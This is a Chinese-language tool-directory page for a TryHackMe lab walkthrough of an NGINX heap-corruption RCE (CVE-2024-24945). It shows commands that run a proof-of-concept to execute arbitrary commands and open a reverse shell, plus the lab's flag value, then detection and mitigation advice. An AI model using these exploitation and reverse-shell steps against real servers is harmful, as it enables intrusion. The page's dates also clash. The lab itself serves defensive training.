Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough — 本实验演示了CVE-2024-24945的利用,这是一个影响NGINX的堆损坏漏洞。目标是理解内存损坏如何导致远程代码执行(RCE),并获得利用、检测和缓解技术的实践经验。 | Kitploit
工具/GitHubGitHub/benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough
漏洞分析漏洞利用Web应用程序漏洞利用CTF渗透测试学习与教育二进制利用实验室与实践
GitHub

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
benedictejepu/cve-2024-24945-nginx-rift---tryhackme-lab-walkthrough

CVE-2024-24945-NGINX-RIFT---TryHackMe-Lab-Walkthrough

本实验演示了CVE-2024-24945的利用,这是一个影响NGINX的堆损坏漏洞。目标是理解内存损坏如何导致远程代码执行(RCE),并获得利用、检测和缓解技术的实践经验。

查看仓库
42个月前尚未审核
分享

CVE-2024-24945-NGINX-RIFT---TryHackMe实验演练

本实验演示了CVE-2024-24945的利用,这是一个影响NGINX的堆损坏漏洞。 目标是了解内存损坏如何导致远程代码执行(RCE), 并获得利用、检测和缓解技术的实践经验。

目标

. 确认存在漏洞的NGINX服务。 . 使用提供的概念验证(PoC)执行任意命令。 . 在目标容器上获得反弹shell。 . 获取挑战标志。 . 了解检测和缓解策略。

实验环境

. 平台:TryHackMe . 目标服务:NGINX RIFT . 容器化环境:Docker . 利用工具:poc.py . 访问方式:VNC(虚拟网络计算)

方法论

  1. 服务验证

  2. 确认存在漏洞的容器正在运行且可访问。

  3. root@kitploit:~
    sudo docker ps
    curl -s http://127.0.0.1:19321/api/users/42
    

后端正常

  1. 远程代码执行

执行提供的PoC以验证任意命令执行。

root@kitploit:~
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned

验证成功执行:

root@kitploit:~
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned

输出: hello from depthfirst

反弹Shell访问

在目标容器上建立一个交互式shell。

root@kitploit:~
python3 poc.py --shell

成功连接:

[] 正在监听端口1337上的反弹shell... [] 已连接。 $

  1. 标志检索

访问挑战标志。

root@kitploit:~
cat /flag.txt

标志:

THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}

检测机会

防御者可以通过以下方式识别利用尝试:

. NGINX工作进程崩溃 . 段错误事件 . 意外的出站网络连接 . 可疑的shell进程(/bin/sh, bash) . 在临时目录中创建未经授权的文件

缓解策略

. 升级到打过补丁的NGINX版本。 . 应用最小权限原则。 . 限制不必要的出站网络流量。 . 实施持续日志监控。 . 使用容器安全控制和运行时监控。

关键收获

本实验提供了以下方面的实践经验:

. 理解堆损坏漏洞。 . 利用远程代码执行缺陷。 . 建立反弹shell。 . 进行后利用验证。 . 识别危害指标和缓解技术。

免责声明

此练习是在受控的TryHackMe实验室环境中进行的, 仅用于教育和防御性网络安全培训目的。

作者:[Benedict Ejepu Amaechi] 平台:TryHackMe 主题:CVE-2024-24945 NGINX RIFT 利用与防御 完成日期:2026年6月

下载工具